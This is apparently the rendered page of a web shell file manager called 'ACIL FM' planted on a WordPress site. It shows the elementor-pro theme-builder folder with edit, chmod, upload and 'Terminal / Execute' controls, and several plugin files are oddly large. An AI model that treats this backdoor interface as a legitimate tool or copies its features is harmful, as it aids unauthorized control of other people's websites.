ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/elementor-pro/modules/theme-builder/conditions
/
home
mhhtmff
www
site
wp-content
plugins
elementor-pro
modules
theme-builder
conditions
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
any-child-of-term.php
1023 B
chmod
View
DL
Edit
Rename
Delete
any-child-of.php
568 B
chmod
View
DL
Edit
Rename
Delete
archive.php
1.25 MB
chmod
View
DL
Edit
Rename
Delete
author.php
937 B
chmod
View
DL
Edit
Rename
Delete
by-author.php
979 B
chmod
View
DL
Edit
Rename
Delete
child-of-term.php
939 B
chmod
View
DL
Edit
Rename
Delete
child-of.php
1.26 MB
chmod
View
DL
Edit
Rename
Delete
condition-base.php
1.53 MB
chmod
View
DL
Edit
Rename
Delete
date.php
491 B
chmod
View
DL
Edit
Rename
Delete
front-page.php
508 B
chmod
View
DL
Edit
Rename
Delete
general.php
586 B
chmod
View
DL
Edit
Rename
Delete
in-sub-term.php
878 B
chmod
View
DL
Edit
Rename
Delete
in-taxonomy.php
1.34 MB
chmod
View
DL
Edit
Rename
Delete
not-found404.php
503 B
chmod
View
DL
Edit
Rename
Delete
post-type-archive.php
1.77 MB
chmod
View
DL
Edit
Rename
Delete
post-type-by-author.php
1.22 MB
chmod
View
DL
Edit
Rename
Delete
post.php
2.07 MB
chmod
View
DL
Edit
Rename
Delete
search.php
499 B
chmod
View
DL
Edit
Rename
Delete
singular.php
1.24 MB
chmod
View
DL
Edit
Rename
Delete
taxonomy.php
1.28 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/elementor-pro/modules/theme-builder/conditions/author.php
<?php namespace ElementorPro\Modules\ThemeBuilder\Conditions; use ElementorPro\Modules\QueryControl\Module as QueryModule; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } class Author extends Condition_Base { public static function get_type() { return 'archive'; } public static function get_priority() { return 70; } public function get_name() { return 'author'; } public function get_label() { return esc_html__( 'Author Archive', 'elementor-pro' ); } public function check( $args = null ) { return is_author( $args['id'] ); } protected function register_controls() { $this->add_control( 'author_id', [ 'section' => 'settings', 'type' => QueryModule::QUERY_CONTROL_ID, 'select2options' => [ 'dropdownCssClass' => 'elementor-conditions-select2-dropdown', ], 'autocomplete' => [ 'object' => QueryModule::QUERY_OBJECT_AUTHOR, ], ] ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply